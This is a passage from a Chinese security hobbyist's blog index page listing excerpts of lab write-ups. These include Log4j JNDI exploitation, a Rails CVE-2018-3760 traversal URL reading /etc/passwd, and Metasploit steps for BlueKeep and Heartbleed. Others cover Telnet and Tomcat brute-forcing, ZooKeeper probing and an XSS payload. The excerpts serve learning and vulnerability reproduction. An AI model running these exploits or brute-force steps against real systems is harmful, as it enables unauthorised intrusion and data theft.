自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(46)
  • 收藏
  • 关注

原创 AWVS中postgresql连接

windows下C:\ProgramData\Acunetix\settings.ini默认只能本地访问成功连上

2022-05-10 11:05:43 395

原创 phpstorm跟phpstudy调试xdebug3.1.4一直报错问题解决

首先下载一个phpstudyhttps://xdebug.org/download下载xdebug3.1.4上面是根据php版本选的下载完成之后将xdebug3.1.4放入D:\phpstudy_pro\Extensions\php\php7.3.4nts\ext文件中修改配置D:\phpstudy_pro\Extensions\php\php7.3.4nts\php.ini如下[xdebug]xdebug.mode = debugzend_extension="D:\phpst

2022-04-10 22:44:06 936 1

原创 log4本地简单复现

先下载环境https://github.com/Yihsiwei/Log4j-exphttps://github.com/welk1n/JNDI-Injection-Exploitcmd运行java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C “calc” -A “127.0.0.1”运行结束。

2021-12-31 17:31:17 258

原创 burp抓取电脑微信小程序的数据包

第一步:下载burp证书双击安装点击安装证书点击下一步点击下一步就完成安装了然后打开ie浏览器设置如下打开电脑微信->小程序,burp就能抓到微信小程序的包了。

2021-11-04 13:18:17 6650 3

原创 云服务器CVE-2021-24074漏洞修复

突然有一天腾讯云给我发了一个短信说我的服务器有漏洞,giao,这他喵的能忍?马上连上服务器去修复漏洞访问地址https://www.catalog.update.microsoft.com/Search.aspx?q=KB4601349下载对应的补丁我的服务器是所以直接下载了下载完毕,创建快照方便搞出问题后及时补救。双击运行,重启电脑后运行systeminfo查看信息,已安装KB4601349OK补丁打上再来扫描试试看看还有没有洞漏洞已修复...

2021-07-07 16:25:31 1788

原创 phpstudy8.1安装duxcms3.1.3

环境搭建,phpstudy8.11.源码下载https://github.com/duxphp/DuxCMS32.安装 Composer配置成全局composer 配置环境变量设置composer.json运行composer install结果如下运行完毕,生成vendor文件![在这里插入图片描述](https://img-blog.csdnimg.cn/2021042719391143.png这个文件是必须要有的如果没有Vendor文件则不可安装此cms配置伪静态成

2021-04-27 19:41:26 297 1

原创 adb工具简单使用

下载windows的https://dl.google.com/android/repository/platform-tools_r30.0.5-windows.zip解压运行adb.exe开始运行有报错adb server version (36) doesn’t match this client (41); killing…直接百度解决,这里就不详细说了。开始配合夜神模拟器上传下载文件adb pull 模拟器路径 windows路径这样文件就下载到桌面的upload文件中

2021-01-18 14:21:27 155

原创 kali安装Apache flink 1.11.1

本来打算在windows上安装Apache flink 1.11.1的,但是下载的安装包里面没有windows的启动脚本只有start-cluster.sh,so,只好到kali里面安装了。首先下载安装包直接复制到kali里面启动测试任意文件读取其他的暂时不公布哈哈。...

2021-01-18 10:28:34 129

原创 burp抓取ios的数据包

1.将证书安装在ios中通过qq邮箱将在火狐浏览器-设置-隐私安全查看证书-证书颁发机构-导出PortSwiggerCA.crt发送到ios手机中2.双击安装PortSwiggerCA.crt,提示到设置-通用-描述文件-安装信任3.设置->通用->关于本机->证书信任设置,将burpsuite的证书开启即可4.设置ios代理,burp代理开始抓包...

2021-01-15 15:04:27 908

原创 burp抓取手机app上的流量

第一步:关掉电脑上的防火墙(温馨小提示:不关防火墙可能会遇到各种各样抓不到流量的问题)第二步:手机跟电脑连接在同一局域网内,就是连上同一个wifi,然后查看电脑的ip第三步:设置burp的代理然后设置手机wifi代理手机访问http://192.168.0.194:8080然后下载证书,并将证书后缀改成cer,双击安装之后就能开心的抓包了。...

2020-12-29 21:02:31 855

原创 excel单列变多列的py脚本

帮朋友写的import xlrdimport xlwtdef list_split(items, n): return [items[i:i+n] for i in range(0, len(items), n)]#读取excel文件def excel(): wb = xlrd.open_workbook('C:\\Desktop\\a.xls')# 打开Excel文件 sheet = wb.sheet_by_name('Sheet1')#通过excel表格名称(r

2020-11-25 13:13:41 87

原创 burp本地抓包

作者大大在测试的时候发现自己的burp抓不了本地的数据包,自己鼓捣了很久其实很简单的事情。就是使用switchyomega时把不代理地址清空就好了。

2020-11-16 18:32:52 590

原创 萌新代码审计(一)

由于本大大太菜只能走别人的路了本次审计参照了freebuff的文章实验环境phpstudy+emlog_6.0.0漏洞1(sql注入)在comment.php中可以看到传入了IP可控参数并且调用了delCommentByIp函数,接下来全局搜索delCommentByIp函数,看看这个函数是干啥的。很明显了,接下来我们去测试一下,需要管理员登录。抓包看一下漏洞2(任意文件上传)在plugin.php中可以上传插件,插件格式为zip压缩包,之后会对上传的文件进行解压,这里有问题的哦。

2020-09-16 10:04:39 152

原创 Shiro RememberMe 1.2.4 反序列化漏洞复现

环境kali虚拟机vpswindwos物理机安装docker环境启动dockersystemctl start docker搭建靶场git clone https://github.com/vulhub/vulhub.gitcd vulhub/shiro/CVE-2016-4437docker-compose up -d #启动靶场访问页面接下来就是淦,准备poc和vps(需要java环境)poc,百度找‘梦之履行地’大佬的import sysimport uuid

2020-08-27 10:21:26 367

原创 windows版tomcat后台getshell

修改一点点东西C:\Program Files\Apache Software Foundation\Tomcat 8.5\webapps\manager\META-INF\context.xml改成重启tomcat可以访问了kali爆破一手开始正餐

2020-08-15 14:54:35 206

原创 awvs13安装

访问url下载https://github.com/starnightcyber/Miscellaneous/releases/tag/awvs13安装替换完毕之后破解方式:wvsc.exe覆盖到“C:\Program Files (x86)\Acunetix\13.0.200205121license_info.json覆盖到“C:\ProgramData\Acunetix\shared\license”网页无法打开找到Acunetix服务是否开启,一般是两个服务已启动还是访问不

2020-08-04 11:21:17 864 1

原创 Ruby On Rails漏洞复现第一题(CVE-2018-3760)

墨者靶场环境漏洞pochttp://219.153.49.228:46238/assets/file:%2f%2f/usr/src/blog/app/assets/images/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd拿到key

2020-08-03 21:43:08 355

原创 CVE-2018-7490实验

打开靶场看到uWSGI可能存在CVE-2018-7490漏洞百度搜索CVE-2018-7490发现像是任意文件读取漏洞开始利用读取etc/passwd

2020-08-03 21:16:04 394

原创 cve-2019-0708复现

准备一天靶机win7 sp1开启rdp,关闭防火墙和防护软件kali远程登录一波选择expuse exploit/windows/rdp/cve_2019_0708_bluekeep_rceset rhost 目的IPset rport 目的端口set target 1-4(可以选择)set payload windows/x64/meterpreter/reverse_tcp (没有这句payload目的电脑会蓝屏)run结束...

2020-05-24 23:29:07 300

原创 心脏滴血复现

复现一波远古漏洞先搭环境建议下载Bee-box漏洞集成虚拟机网上可以找到用vmvare打开修改一些设置不然输入法你可能看不懂然后我们可以输入命令了查看IP添加例外访问登录账户密码bee/bugkali用nmap扫描启动msfconsolesearch heartbleeduse auxiliary/scanner/ssl/openssl_heartbleedshow options设置参数看到可以利用再继续设置可以看到一些东西哈哈...

2020-05-24 01:50:37 265

原创 burp与xray实现被动扫描

下载xrayhttps://github.com/chaitin/xray/releases安装xray证书.\xray_windows_amd64.exe genca证书已经安装好利用xray实行被动扫描.\xray_windows_amd64.exe webscan --listen 127.0.0.1:7777 --html-output proxy.html打开burp填好被动扫描地址打开浏览器设置burp代理就可以开始扫描了...

2020-05-12 10:20:59 1046

原创 kali虚拟机安装W13scan

下载w13scangit clone https://github.com/boy-hack/w13scan & cd w13scan开始安装cd w13scan/pip3 install -r requirements.txt开始报错,后来发现是网络问题重新安装安装成功cd W13SCAN/python3 cli.py打开浏览器设置代理127.0.0.8 7778访问http://w13scan.ca 下载证书并导入证书之后浏览器访问测试网站就能愉快的体验被动

2020-05-11 12:20:58 677

原创 实战序列化和反序列化

环境搭建phpstudy序列化代码如下<?phpclass A{ var $test = "<img src=1 οnerrοr=alert(1)>"; function __wakeup(){ echo $this->test; }}$b = new A();$c = serialize($b);echo $c;?>测试效果反序列化代码如下<?phpclass A{ var $test

2020-05-09 13:20:13 137

原创 利用火绒强行删除文件

1.选中你所需要删除的文件夹或者文件2.右键使用火绒粉碎文件3.若无法粉碎,右键使用火绒解除占用4.右键使用火绒粉碎文件就行了

2020-05-05 22:44:53 2914

原创 Linux-ZooKeeper未授权访问漏洞修复方案

直接访问urlhttps://blog.csdn.net/baidu_39459954/article/details/90748332

2020-04-27 18:54:45 2557

原创 kali验证Zookeeper未授权访问测试

首先nmap扫描一波root@kali:~# nmap -Pn -p 2181 xx.xx.xx.xxconf命令:输出相关服务配置的详细信息,端口、数据路径、日志路径、session 超时时间,最大连接数等。root@kali:~# echo conf | nc xx.xx.xx.xx 2181cons命令:列出所有连接到当前服务器的客户端/会话的详细信息。root@kali:~#...

2020-04-27 18:45:29 1036

原创 批量获取IP地址段中所有IP(二)

import refilename=open('ip.txt','r+')fb=open('ipout.txt','w+')def group(line,mode=0): r = re.split("\s{2,}",line) domain = r[0].strip() ip = r[1].strip() if mode == 0: return domain elif mo...

2020-04-24 12:31:16 479 1

原创 批量获取IP地址段的所有ip

创建ip.pyimport IPypath=(r'C:\ip.txt') //txt中放入ip地址段fp=open(path,'r')for ip in fp.readlines(): ip=ip.strip() ip = IPy.IP(ip) for x in ip: print(x)使用方法python3<C:\ip.py>ipout.txt...

2020-04-21 12:35:13 700

原创 HTTP.sys 远程执行代码漏洞修复方案

Microsoft Windows HTTP.sys 远程执行代码漏洞(CVE-2015-1635)访问网站https://technet.microsoft.com/library/security/ms15-034页面如下判断自己服务器属于哪一个操作系统如果害怕打完补丁电脑运行会出问题建议备份windows的可以备份注册表选中计算机然后点击上面的文件-导出,然后下载补丁访问...

2020-04-20 22:16:51 3442

原创 360安全杀毒

打开360点击木马查杀你可以选择全盘查杀或者按位置查杀一.全盘查杀需要花费很长的时间,但是会对你的电脑的所有文件进行查杀,比较全面二.按位置查杀,你可以选择你想要检测的地方进行查杀...

2020-04-19 22:05:15 211

原创 Dirmap:一款高级Web目录文件扫描工具

直接访问以下网站查看详情https://www.freebuf.com/sectool/200890.html

2020-04-18 21:48:55 1397

原创 一个学习技术网站导航分享

https://index.tesla-space.com/里面有很多的资源贼香

2020-04-18 20:34:45 221

原创 tomcat文件包含漏洞复现+环境搭建

安装java环境,修改配置vim /etc/profileexport JAVA_HOME=/usr/local/jdk1.8.0_201export PATH=JAVAHOME/bin:JAVA_HOME/bin:JAVAH​OME/bin:PATHexport CLASSPATH=.:JAVAHOME/lib/dt.jar:JAVA_HOME/lib/dt.jar:JAVAH​OME/l...

2020-04-17 22:28:04 362

原创 wannaren病毒实验

防止wannaren病毒穿透虚拟机,我在虚拟机和实体机上都装上了安全软件直接开整,先将病毒上传到虚拟机运行winword.exe被360直接杀掉了牛逼然后恢复虚拟机快照,关掉杀毒软件,重新运行wannaren,但是没有反应,怀疑可能会识别虚拟机。...

2020-04-16 21:44:48 310

原创 利用kali爆破telnet

第一步启动msfconsolesearch telnetuse auxiliary/scanner/telnet/telnet_login,然后show optionsset rhosts IP(目标IP)set USERPASS_FILE /usr/share/wordlists/metasploit/piata_ssh_userpass.txt (设置爆破所使...

2020-04-16 12:01:38 3030 7

原创 kali爆破tomcat账户密码

首先启动msfconsole第二步search tomcat第三步useauxiliary/scanner/http/tomcat_mgr_login,show options第四步更改配置 set rhost ip (目标IP),set rport port(目标端口),set STOP_ON_SUCCESS true (爆破成功是停止)在show options...

2020-04-16 10:38:59 992 2

原创 批量查询ip地址

# -*- coding: utf-8 -*-import urllibimport requestsfrom requests.packages import urllib3import redata = open("C:\\xxx\\Desktop\\cs1.txt",'w',encoding="utf-8")urllib3.disable_warnings()pa = re....

2019-12-27 09:04:49 838

原创 批量合并xls或xlsx

import xlrdimport xlwt#打开一个Exceldef open_xls(file): fh=xlrd.open_workbook(file) return fh#获取excel中所有的sheet表def getsheet(fh): return fh.sheets()#获取table的行数def getnrows(fh,sh...

2019-12-17 16:59:21 1319

原创 批量修改文件后缀名

import os# 列出当前目录下所有的文件path='C:\\xxx\\xxx\\xxx\\xxxx'files = os.listdir(path) # 如果path为None,则使用path = '.' print(files)for filename in files: portion = os.path.splitext(filename) # 分离文件名与扩展...

2019-12-17 16:51:07 105

原创 解决卡里虚拟机只有本地网卡lo问题

Ipconfig发现只有一张网卡vim /etc/network/interfacessudo /etc/init.d/networking restart启动网卡ifconfigPing www.baidu.comok结束

2019-12-12 08:52:33 876

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除